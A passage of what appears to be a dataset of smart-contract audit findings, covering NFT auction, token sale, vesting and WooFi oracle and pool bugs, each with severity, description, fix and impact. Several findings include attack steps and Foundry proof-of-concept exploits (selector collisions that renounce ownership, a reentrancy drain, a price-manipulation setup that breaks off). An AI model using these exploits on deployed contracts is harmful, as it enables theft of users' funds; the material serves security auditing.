owner.getAddress(), licensePeriod, 0, 10],\\n```\\n\\nRun `yarn run hardhat test --grep 'POC'`чAlter EnglishPeriodicAuctionInternal.sol::L#330 as follows :\\n```\\n// Remove the line below\\n totalCollateralAmount > bidAmount,\\n// Add the line below\\n totalCollateralAmount >= bidAmount, \\n```\\nчThe protocol becomes dysfunctional in such a scenario as users as DOS'd from placing a bid.ч```\\nuint256 totalCollateralAmount = bid.collateralAmount + collateralAmount;\\n```\\n -Currently auctioned NFTs can be transferred to a different address in a specific edge caseчmediumчCurrently auctioned NFTs can be transferred to a different address in a specific edge case, leading to theft of funds.\\nThe protocol assumes that an NFT cannot change owner while it's being auctioned, this is generally the case but there is an exception, an NFT can change owner via mintToken() while an auction is ongoing when all the following conditions apply:\\nAn NFT is added `to` the collection without being minted (ie. `to` set `to` address(0)).\\nThe NFT is added `to` the collection with the parameter `tokenInitialPeriodStartTime[]` set `to` a timestamp lower than `l.initialPeriodStartTime` but bigger than 0(ie. `0` < `tokenInitialPeriodStartTime[]` < l.initialPeriodStartTime).\\nThe current `block.timestamp` is in-between `tokenInitialPeriodStartTime[]` and `l.initialPeriodStartTime`.\\nA malicious `initialBidder` can take advantage of this by:\\nBidding on the new added NFT via placeBid().\\nCalling mintToken() to transfer the NFT to a different address he controls.\\nClosing the auction via closeAuction()\\nAt point `3.`, because the NFT owner changed, the winning bidder (ie. initialBidder) is not the current NFT owner anymore. This will trigger the following line of code:\\n```\\nl.availableCollateral[oldBidder] += l.highestBids[tokenId][currentAuctionRound].bidAmount;\\n```\\n\\nWhich increases the `availableCollateral` of the `oldBidder` (ie. the address that owns the NFT after point 2.) by `bidAmount` of the highest bid. But because at the moment the highest bid was placed `initialBidder` was also the NFT owner, he only needed to transfer the `ETH` fee to the protocol instead of the whole bid amount.\\nThe `initialBidder` is now able to extract ETH from the protocol via the address used in point `2.` by calling withdrawCollateral() while also retaining the NFT license.чDon't allow `tokenInitialPeriodStartTime[]` to be set at a timestamp beforel.initialPeriodStartTime.чMalicious initial bidder can potentially steal ETH from the protocol in an edge case. If the `ADD_TOKEN_TO_COLLECTION_ROLE` is also malicious, it's possible to drain the protocol.ч```\\nl.availableCollateral[oldBidder] += l.highestBids[tokenId][currentAuctionRound].bidAmount;\\n```\\n -Tax refund is calculated based on the wrong amountчhighчTax refund is calculated based on the wrong amount\\nAfter the private period has finished, users can claim a tax refund, based on their max tax free allocation.\\n```\\n (s.share, left) = _claim(s);\\n require(left > 0, \"TokenSale: Nothing to claim\");\\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE;\\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n```\\n\\nThe problem is that in case `s.share > taxFreeAllc`, the tax refund is calculated wrongfully. Not only it should refund the tax on the unused USDC amount, but it should also refund the tax for the tax-free allocation the user has.\\nImagine the following.\\nUser deposits 1000 USDC.\\nPrivate period finishes, token oversells. Only half of the user's money actually go towards the sell (s.share = 500 USDC, s.left = 500 USDC)\\nThe user has 400 USDC tax-free allocation\\nThe user must be refunded the tax for the 500 unused USDC, as well as their 400 USDC tax-free allocation. In stead, they're only refunded for the 500 unused USDC. (note, if the user had 500 tax-free allocation, they would've been refunded all tax)чchange the code to the following:\\n```\\n refundTaxAmount = ((left + taxFreeAllc) * tax) / POINT_BASE;\\n```\\nчUsers are not refunded enough taxч```\\n (s.share, left) = _claim(s);\\n require(left > 0, \"TokenSale: Nothing to claim\");\\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE;\\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n```\\n -Vesting contract cannot work with ETH, although it's supposed to.чmediumчVesting contract cannot work with native token, although it's supposed to.\\nWithin the claim function, we can see that if `token` is set to address(1), the contract should operate with ETH\\n```\\n function claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, \"No Deposit\");\\n require(s.index != vestingPoints.length, \"already claimed\");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\"); // @audit - here\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n\\nHowever, it is actually impossible for the contract to operate with ETH, since `updateUserDeposit` always attempts to do a token transfer.\\n```\\n function updateUserDeposit(\\n address[] memory _users,\\n uint256[] memory _amount\\n ) public onlyRole(DEFAULT_ADMIN_ROLE) {\\n require(_users.length <= 250, \"array length should be less than 250\");\\n require(_users.length == _amount.length, \"array length should match\");\\n uint256 amount;\\n for (uint256 i = 0; i < _users.length; i++) {\\n userdetails[_users[i]].userDeposit = _amount[i];\\n amount += _amount[i];\\n }\\n token.safeTransferFrom(distributionWallet, address(this), amount); // @audit - this will revert\\n }\\n```\\n\\nSince when the contract is supposed to work with ETH, token is set to address(1), calling `safeTransferFrom` on that address will always revert, thus making it impossible to call this function.чmake the following check\\n```\\n if (address(token) != address(1)) token.safeTransferFrom(distributionWallet, address(this), amount);\\n```\\nчVesting contract is unusable with ETHч```\\n function claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, \"No Deposit\");\\n require(s.index != vestingPoints.length, \"already claimed\");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\"); // @audit - here\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n -If token does not oversell, users cannot claim tax refund on their tax free allocation.чhighчUsers may not be able to claim tax refund\\nWithin TokenSale, upon depositing users, users have to pay tax. Then, users can receive a tax-free allocation - meaning they'll be refunded the tax they've paid on part of their deposit.\\nThe problem is that due to a unnecessary require check, users cannot claim their tax refund, unless the token has oversold.\\n```\\n function claim() external {\\n checkingEpoch();\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n \"TokenSale: Not time or not allowed\"\\n );\\n\\n Staked storage s = stakes[msg.sender];\\n require(s.amount != 0, \"TokenSale: No Deposit\"); \\n require(!s.claimed, \"TokenSale: Already Claimed\");\\n\\n uint256 left;\\n (s.share, left) = _claim(s);\\n require(left > 0, \"TokenSale: Nothing to claim\"); // @audit - problematic line \\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE; // tax refund is on the wrong amount \\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n s.claimed = true;\\n usdc.safeTransfer(msg.sender, left);\\n emit Claim(msg.sender, left);\\n }\\n```\\n\\n```\\n function _claim(Staked memory _s) internal view returns (uint120, uint256) {\\n uint256 left;\\n if (state.totalPrivateSold > (state.totalSupplyInValue)) {\\n uint256 rate = (state.totalSupplyInValue * PCT_BASE) /\\n state.totalPrivateSold;\\n _s.share = uint120((uint256(_s.amount) * rate) / PCT_BASE);\\n left = uint256(_s.amount) - uint256(_s.share);\\n } else {\\n _s.share = uint120(_s.amount);\\n }\\n\\n return (_s.share, left);\\n }\\n```\\n\\n`left` only has value if the token has oversold. Meaning that even if the user has an infinite tax free allocation, if the token has not oversold, they won't be able to claim a tax refund.чRemove the require checkчloss of fundsч```\\n function claim() external {\\n checkingEpoch();\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n \"TokenSale: Not time or not allowed\"\\n );\\n\\n Staked storage s = stakes[msg.sender];\\n require(s.amount != 0, \"TokenSale: No Deposit\"); \\n require(!s.claimed, \"TokenSale: Already Claimed\");\\n\\n uint256 left;\\n (s.share, left) = _claim(s);\\n require(left > 0, \"TokenSale: Nothing to claim\"); // @audit - problematic line \\n uint256 refundTaxAmount;\\n if (s.taxAmount > 0) {\\n uint256 tax = userTaxRate(s.amount, msg.sender);\\n uint256 taxFreeAllc = _maxTaxfreeAllocation(msg.sender) * PCT_BASE;\\n if (taxFreeAllc >= s.share) {\\n refundTaxAmount = s.taxAmount;\\n } else {\\n refundTaxAmount = (left * tax) / POINT_BASE; // tax refund is on the wrong amount \\n }\\n usdc.safeTransferFrom(marketingWallet, msg.sender, refundTaxAmount);\\n }\\n s.claimed = true;\\n usdc.safeTransfer(msg.sender, left);\\n emit Claim(msg.sender, left);\\n }\\n```\\n -Reentrancy in Vesting.sol:claim() will allow users to drain the contract due to executing .call() on user's address before setting s.index = uint128(i)чhighчReentrancy in Vesting.sol:claim() will allow users to drain the contract due to executing .call() on user's address before setting s.index = uint128(I)\\nHere is the Vesting.sol:claim() function:\\n```\\nfunction claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, \"No Deposit\");\\n require(s.index != vestingPoints.length, \"already claimed\");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\");\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n\\nFrom the above, You'll notice the claim() function checks if the caller already claimed by checking if the s.index has already been set to vestingPoints.length. You'll also notice the claim() function executes .call() and transfer the amount to the caller before setting the s.index = uint128(i), thereby allowing reentrancy.\\nLet's consider this sample scenario:\\nAn attacker contract(alice) has some native pctAmount to claim and calls `claim()`.\\n\"already claimed\" check will pass since it's the first time she's calling `claim()` so her s.index hasn't been set\\nHowever before updating Alice s.index, the Vesting contract performs external .call() to Alice with the amount sent as well\\nAlice reenters `claim()` again on receive of the amount\\nbypass index \"already claimed\" check since this hasn't been updated yet\\ncontract performs external .call() to Alice with the amount sent as well again,\\nSame thing happens again\\nAlice ends up draining the Vesting contractчHere is the recommended fix:\\n```\\nif (pctAmount != 0) {\\n// Add the line below\\n s.index = uint128(i);\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\");\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n// Remove the line below\\n s.index = uint128(i);\\n s.amountClaimed // Add the line below\\n= pctAmount;\\n }\\n```\\n\\nI'll also recommend using reentrancyGuard.чReentrancy in Vesting.sol:claim() will allow users to drain the contractч```\\nfunction claim() external {\\n address sender = msg.sender;\\n\\n UserDetails storage s = userdetails[sender];\\n require(s.userDeposit != 0, \"No Deposit\");\\n require(s.index != vestingPoints.length, \"already claimed\");\\n uint256 pctAmount;\\n uint256 i = s.index;\\n for (i; i <= vestingPoints.length - 1; i++) {\\n if (block.timestamp >= vestingPoints[i][0]) {\\n pctAmount += (s.userDeposit * vestingPoints[i][1]) / 10000;\\n } else {\\n break;\\n }\\n }\\n if (pctAmount != 0) {\\n if (address(token) == address(1)) {\\n (bool sent, ) = payable(sender).call{value: pctAmount}(\"\");\\n require(sent, \"Failed to send BNB to receiver\");\\n } else {\\n token.safeTransfer(sender, pctAmount);\\n }\\n s.index = uint128(i);\\n s.amountClaimed += pctAmount;\\n }\\n }\\n```\\n -Blocklisted investors can still claim USDC in `TokenSale.sol`чmediumчA wrong argument is passed when checking if a user is blacklisted for claiming in `TokenSale.claim()`. Because the check is insufficient, blocked users can claim their USDC.\\n`Admin.setClaimBlock()` blocks users from claiming. The function accepts the address of the user to be blocked and adds it to the `blockClaim` mapping.\\n```\\n /**\\n @dev Whitelist users\\n @param _address Address of User\\n */\\n function setClaimBlock(address _address) external onlyRole(OPERATOR) {\\n blockClaim[_address] = true;\\n }\\n```\\n\\nThe check in `Admin.claim()` wrongly passes `address(this)` as argument when calling `Admin.blockClaim`.\\n```\\n require(\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n \"TokenSale: Not time or not allowed\"\\n );\\n```\\n\\nIn this context, `address(this)` will be the address of the token sale contract and the require statement can be bypassed even by a blocked user.чPass the address of the user.\\n```\\n require(\\n// Remove the line below\\n uint8(epoch) > 1 && !admin.blockClaim(address(this)),\\n// Add the line below\\n uint8(epoch) > 1 && !admin.blockClaim(msg.sender)),\\n \"TokenSale: Not time or not allowed\"\\n );\\n```\\nчThe whole functionality for blocking claims doesn't work properly.ч```\\n /**\\n @dev Whitelist users\\n @param _address Address of User\\n */\\n function setClaimBlock(address _address) external onlyRole(OPERATOR) {\\n blockClaim[_address] = true;\\n }\\n```\\n -Max allocations can be bypassed with multiple addresses because of guaranteed allocationsчmediumч`TokenSale._processPrivate()` ensures that a user cannot deposit more than their allocation amount. However, each address can deposit up to at least `maxAllocations`. This can be leveraged by a malicious user by using different addresses to claim all tokens without even staking.\\nThe idea of the protocol is to give everyone the right to have at least `maxAlocations` allocations. By completing missions, users level up and unlock new tiers. This process will be increasing their allocations. The problem is that when a user has no allocations, they have still a granted amount of `maxAllocations`.\\n`TokenSale.calculateMaxAllocation` returns $max(maxTierAlloc(), maxAllocation)$\\nFor a user with no allocations, `_maxTierAlloc()` will return 0. The final result will be that this user have `maxAllocation` allocations (because `maxAllocation` > 0).\\n```\\n if (userTier == 0 && giftedTierAllc == 0) {\\n return 0;\\n }\\n```\\n\\nMultiple Ethereum accounts can be used by the same party to take control over the IDO and all its allocations, on top of that without even staking.\\nNOTE: setting `maxAllocation = 0` is not a solution in this case because the protocol wants to still give some allocations to their users.чA possible solution may be to modify `calculateMaxAllocation` in the following way:\\n```\\n function calculateMaxAllocation(address _sender) public returns (uint256) {\\n uint256 userMaxAllc = _maxTierAllc(_sender);\\n// Add the line below\\n if (userMaxAllc == 0) return 0;\\n\\n if (userMaxAllc > maxAllocation) {\\n return userMaxAllc;\\n } else {\\n return maxAllocation;\\n }\\n }\\n```\\nчBuying all allocations without staking. This also violates a key property that only ION holders can deposit.ч```\\n if (userTier == 0 && giftedTierAllc == 0) {\\n return 0;\\n }\\n```\\n -Potential damages due to incorrect implementation of the ````ZIP```` algorithmчmediumч`WooracleV2_2.fallback()` is used to post zipped token price and state data to the contract for sake of gas saving. However, the first 4 bytes of zipped data are not reserved to distinguish the `ZIP` call and other normal call's function selector. This would cause `ZIP` calls to be accidentally interpreted as any other functions in the contract, result in unintended exceptions and potential damages.\\nAccording solidity's official doc, there are two forms of `fallback()` function `with` or `without` parameter\\n```\\nfallback () external [payable];\\nfallback (bytes calldata _input) external [payable] returns (bytes memory _output);\\n```\\n\\nIf the version with parameters is used, _input will contain the full data sent to the contract (equal to msg.data)\\nAs the `_input` data is equal to `msg.data`, the solidity compiler would firstly check if first 4 bytes matches any normal function selectors, and would only execute `fallback(_input)` while no matching. Therefore, in zipped data, the first 4 bytes must be set to some reserved function selector, such as `0x00000000`, with no collision to normal function selectors. And the real zipped data then starts from 5th byte.\\nThe following coded PoC shows cases that the zipped data is accidentally interpreted as:\\nfunction renounceOwnership(); function setStaleDuration(uint256); function postPrice(address,uint128); function syncTS(uint256);\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {Test} from \"../../lib/forge-std/src/Test.sol\";\\nimport {console2} from \"../../lib/forge-std/src/console2.sol\";\\nimport {WooracleV2_2} from \"../../contracts/wooracle/WooracleV2_2.sol\";\\n\\ncontract WooracleZipBugTest is Test {\\n WooracleV2_2 public oracle;\\n\\n function setUp() public {\\n oracle = new WooracleV2_2();\\n }\\n\\n function testNormalCase() public {\\n /* reference:\\n File: test\\typescript\\wooraclev2_zip_inherit.test.ts\\n 97: function _encode_woo_price() {\\n op = 0\\n len = 1\\n (base, p)\\n base: 6, woo token\\n price: 0.23020\\n 23020000 (decimal = 8)\\n */\\n uint8 base = 6;\\n bytes memory zip = _makeZipData({\\n op: 0,\\n length: 1,\\n leadingBytesOfBody: abi.encodePacked(base, uint32((2302 << 5) + 4))\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n address wooAddr = oracle.getBase(6);\\n (uint256 price, bool feasible) = oracle.price(wooAddr);\\n assertEq(price, 23020000);\\n assertTrue(feasible);\\n }\\n\\n function testCollisionWithRenounceOwnership() public {\\n // selector of \"renounceOwnership()\": \"0x715018a6\"\\n bytes memory zip = _makeZipData({\\n op: 1,\\n length: 0x31,\\n leadingBytesOfBody: abi.encodePacked(hex\"5018a6\")\\n });\\n assertEq(oracle.owner(), address(this));\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n assertEq(oracle.owner(), address(0));\\n }\\n\\n function testCollisionWithSetStaleDuration() public {\\n // selector of \"setStaleDuration(uint256)\": \"0x99235fd4\"\\n bytes memory zip = _makeZipData({\\n op: 2,\\n length: 0x19,\\n leadingBytesOfBody: abi.encodePacked(hex\"235fd4\")\\n });\\n assertEq(oracle.staleDuration(), 120); // default: 2 mins\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n uint256 expectedStaleDuration;\\n assembly {\\n expectedStaleDuration := mload(add(zip, 36))\\n }\\n assertEq(oracle.staleDuration(), expectedStaleDuration);\\n assertTrue(expectedStaleDuration != 120);\\n }\\n\\n function testCollisionWithPostPrice() public {\\n // selector of \"postPrice(address,uint128)\": \"0xd5bade07\"\\n bytes memory addressAndPrice = abi.encode(address(0x1111), uint256(100));\\n bytes memory zip = _makeZipData({\\n op: 3,\\n length: 0x15,\\n leadingBytesOfBody: abi.encodePacked(hex\"bade07\", addressAndPrice)\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n (uint256 price, bool feasible) = oracle.price(address(0x1111));\\n assertEq(price, 100);\\n assertTrue(feasible);\\n }\\n\\n function testCollisionWithSyncTS() public {\\n // selector of \"syncTS(uint256)\": \"4f1f1999\"\\n uint256 timestamp = 12345678;\\n bytes memory zip = _makeZipData({\\n op: 1,\\n length: 0xf,\\n leadingBytesOfBody: abi.encodePacked(hex\"1f1999\", timestamp)\\n });\\n (bool success, ) = address(oracle).call(zip);\\n assertEq(success, true);\\n assertEq(oracle.timestamp(), timestamp);\\n }\\n\\n function _makeZipData(\\n uint8 op,\\n uint8 length,\\n bytes memory leadingBytesOfBody\\n ) internal returns (bytes memory result) {\\n assertTrue(length < 2 ** 6);\\n assertTrue(op < 4);\\n bytes1 head = bytes1(uint8((op << 6) + (length & 0x3F)));\\n uint256 sizeOfItem = op == 0 || op == 2 ? 5 : 13;\\n uint256 sizeOfHead = 1;\\n uint256 sizeOfBody = sizeOfItem * length;\\n assertTrue(sizeOfBody >= leadingBytesOfBody.length);\\n result = bytes.concat(head, leadingBytesOfBody, _makePseudoRandomBytes(sizeOfBody - leadingBytesOfBody.length));\\n assertEq(result.length, sizeOfHead + sizeOfBody);\\n }\\n\\n function _makePseudoRandomBytes(uint256 length) internal returns (bytes memory result) {\\n uint256 words = (length + 31) / 32;\\n result = new bytes(words * 32);\\n for (uint256 i; i < words; ++i) {\\n bytes32 rand = keccak256(abi.encode(block.timestamp + i));\\n assembly {\\n mstore(add(add(result, 32), mul(i, 32)), rand)\\n }\\n }\\n\\n assembly {\\n mstore(result, length) // change to required length\\n }\\n assertEq(length, result.length);\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-03-woofi-swap\\WooPoolV2> forge test --match-contract WooracleZipBugTest -vv\\n[⠢] Compiling// rest of codeNo files changed, compilation skipped\\n[⠆] Compiling// rest of code\\n\\nRunning 5 tests for test/foundry/WooracleZipBug.t.sol:WooracleZipBugTest\\n[PASS] testCollisionWithPostPrice() (gas: 48643)\\n[PASS] testCollisionWithRenounceOwnership() (gas: 21301)\\n[PASS] testCollisionWithSetStaleDuration() (gas: 18289)\\n[PASS] testCollisionWithSyncTS() (gas: 35302)\\n[PASS] testNormalCase() (gas: 48027)\\nTest result: ok. 5 passed; 0 failed; 0 skipped; finished in 2.13ms\\n\\nRan 1 test suites: 5 tests passed, 0 failed, 0 skipped (5 total tests)\\n```\\nч```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/WooPoolV2/contracts/wooracle/WooracleV2_2.sol b/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\nindex 9e66c63..4a9138f 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/WooPoolV2/contracts/wooracle/WooracleV2_2.sol\\n@@ // Remove the line below\\n416,9 // Add the line below\\n416,10 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n */\\n\\n uint256 x = _input.length;\\n// Remove the line below\\n require(x > 0, \"WooracleV2_2: !calldata\");\\n// Add the line below\\n require(x > 4, \"WooracleV2_2: !calldata\");\\n// Add the line below\\n require(bytes4(_input[0:4]) == bytes4(hex\"00000000\"));\\n\\n// Remove the line below\\n uint8 firstByte = uint8(bytes1(_input[0]));\\n// Add the line below\\n uint8 firstByte = uint8(bytes1(_input[5]));\\n uint8 op = firstByte 6; // 11000000\\n uint8 len = firstByte & 0x3F; // 00111111\\n\\n@@ // Remove the line below\\n428,12 // Add the line below\\n429,12 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n uint128 p;\\n\\n for (uint256 i = 0; i < len; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n base = getBase(uint8(bytes1(_input[1 // Add the line below\\n i * 5:1 // Add the line below\\n i * 5 // Add the line below\\n 1])));\\n// Remove the line below\\n p = _decodePrice(uint32(bytes4(_input[1 // Add the line below\\n i * 5 // Add the line below\\n 1:1 // Add the line below\\n i * 5 // Add the line below\\n 5])));\\n// Add the line below\\n base = getBase(uint8(bytes1(_input[5 // Add the line below\\n i * 5:5 // Add the line below\\n i * 5 // Add the line below\\n 1])));\\n// Add the line below\\n p = _decodePrice(uint32(bytes4(_input[5 // Add the line below\\n i * 5 // Add the line below\\n 1:5 // Add the line below\\n i * 5 // Add the line below\\n 5])));\\n infos[base].price = p;\\n }\\n\\n// Remove the line below\\n timestamp = (op == 0) ? block.timestamp : uint256(uint32(bytes4(_input[1 // Add the line below\\n len * 5:1 // Add the line below\\n len * 5 // Add the line below\\n 4])));\\n// Add the line below\\n timestamp = (op == 0) ? block.timestamp : uint256(uint32(bytes4(_input[5 // Add the line below\\n len * 5:5 // Add the line below\\n len * 5 // Add the line below\\n 4])));\\n } else if (op == 1 || op == 3) {\\n // post states list\\n address base;\\n@@ // Remove the line below\\n442,14 // Add the line below\\n443,14 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n uint64 k;\\n\\n for (uint256 i = 0; i < len; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n base = getBase(uint8(bytes1(_input[1 // Add the line below\\n i * 9:1 // Add the line below\\n i * 9 // Add the line below\\n 1])));\\n// Remove the line below\\n p = _decodePrice(uint32(bytes4(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 1:1 // Add the line below\\n i * 9 // Add the line below\\n 5])));\\n// Remove the line below\\n s = _decodeKS(uint16(bytes2(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 5:1 // Add the line below\\n i * 9 // Add the line below\\n 7])));\\n// Remove the line below\\n k = _decodeKS(uint16(bytes2(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 7:1 // Add the line below\\n i * 9 // Add the line below\\n 9])));\\n// Add the line below\\n base = getBase(uint8(bytes1(_input[5 // Add the line below\\n i * 9:5 // Add the line below\\n i * 9 // Add the line below\\n 1])));\\n// Add the line below\\n p = _decodePrice(uint32(bytes4(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 1:5 // Add the line below\\n i * 9 // Add the line below\\n 5])));\\n// Add the line below\\n s = _decodeKS(uint16(bytes2(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 5:5 // Add the line below\\n i * 9 // Add the line below\\n 7])));\\n// Add the line below\\n k = _decodeKS(uint16(bytes2(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 7:5 // Add the line below\\n i * 9 // Add the line below\\n 9])));\\n _setState(base, p, s, k);\\n }\\n\\n// Remove the line below\\n timestamp = (op == 1) ? block.timestamp : uint256(uint32(bytes4(_input[1 // Add the line below\\n len * 9:1 // Add the line below\\n len * 9 // Add the line below\\n 4])));\\n// Add the line below\\n timestamp = (op == 1) ? block.timestamp : uint256(uint32(bytes4(_input[5 // Add the line below\\n len * 9:5 // Add the line below\\n len * 9 // Add the line below\\n 4])));\\n } else {\\n revert(\"WooracleV2_2: !op\");\\n }\\n```\\nчThis bug would result in unintended exceptions and potential damages such as:\\nCollision with normal price post functions might cause users' trades executed on incorrect price and suffer losses.\\nCollision with any view function might cause price post to fail silently and hold on trade processing until next submission, and users' trades might be executed on a delayed inexact price.\\nCollision with `setStaleDuration()` might cause price freshness check to break down.ч```\\nfallback () external [payable];\\nfallback (bytes calldata _input) external [payable] returns (bytes memory _output);\\n```\\n -Price manipulation by swapping any ````baseToken```` with itselfчmediumч`WooPPV2.swap()` doesn't forbid the case that `fromToken == toToken == baseToken`, attackers can make any baseToken's price unboundedly drifting away by swapping with self.\\nThe issue arises due to incorrect logic in WooPPV2._swapBaseToBase():\\nFirstly, we can see the situation that `fromToken == toToken == baseToken` can pass the checks on L521~L522.\\nbaseToken's state & price is cached in memory on L527~L528, and updated first time on L541, but the price calculation on L555 still uses the cached state, and the `newBase2Price` is set to `wooracle` on L556 as the final price after the swap.\\nAs a result, swapping `baseToken` with itself will cause a net price drift rather than keeping price unchanged.\\n```\\nFile: contracts\\WooPPV2.sol\\n function _swapBaseToBase(\\n// rest of code\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, \"WooPPV2: !baseToken1\");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, \"WooPPV2: !baseToken2\");\\n// rest of code\\n IWooracleV2.State memory state1 = IWooracleV2(wooracle).state(baseToken1);\\n IWooracleV2.State memory state2 = IWooracleV2(wooracle).state(baseToken2);\\n// rest of code\\n uint256 newBase1Price;\\n (quoteAmount, newBase1Price) = _calcQuoteAmountSellBase(baseToken1, base1Amount, state1);\\n IWooracleV2(wooracle).postPrice(baseToken1, uint128(newBase1Price));\\n// rest of code\\n uint256 newBase2Price;\\n (base2Amount, newBase2Price) = _calcBaseAmountSellQuote(baseToken2, quoteAmount, state2);\\n IWooracleV2(wooracle).postPrice(baseToken2, uint128(newBase2Price));\\n// rest of code\\n }\\n```\\n\\nThe following coded PoC intuitively shows the problem with a specific case:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {Test} from \"../../lib/forge-std/src/Test.sol\";\\nimport {console2} from \"../../lib/forge-std/src/console2.sol\";\\nimport {WooracleV2_2} from \"../../contracts/wooracle/WooracleV2_2.sol\";\\nimport {WooPPV2} from \"../../contracts/WooPPV2.sol\";\\nimport {TestERC20Token} from \"../../contracts/test/TestERC20Token.sol\";\\nimport {TestUsdtToken} from \"../../contracts/test/TestUsdtToken.sol\";\\n\\ncontract TestWbctToken is TestERC20Token {\\n function decimals() public view virtual override returns (uint8) {\\n return 8;\\n }\\n}\\n\\ncontract PriceManipulationAttackTest is Test {\\n WooracleV2_2 oracle;\\n WooPPV2 pool;\\n TestUsdtToken usdt;\\n TestWbctToken wbtc;\\n address evil = address(0xbad);\\n\\n function setUp() public {\\n usdt = new TestUsdtToken();\\n wbtc = new TestWbctToken();\\n oracle = new WooracleV2_2();\\n pool = new WooPPV2(address(usdt));\\n\\n // parameters reference: Integration_WooPP_Fee_Rebate_Vault.test.ts\\n pool.setMaxGamma(address(wbtc), 0.1e18);\\n pool.setMaxNotionalSwap(address(wbtc), 5_000_000e6);\\n pool.setFeeRate(address(wbtc), 25);\\n oracle.postState({_base: address(wbtc), _price: 50_000e8, _spread: 0.001e18, _coeff: 0.000000001e18});\\n oracle.setWooPP(address(pool));\\n oracle.setAdmin(address(pool), true);\\n pool.setWooracle(address(oracle));\\n\\n // add some initial liquidity\\n usdt.mint(address(this), 10_000_000e6);\\n usdt.approve(address(pool), type(uint256).max);\\n 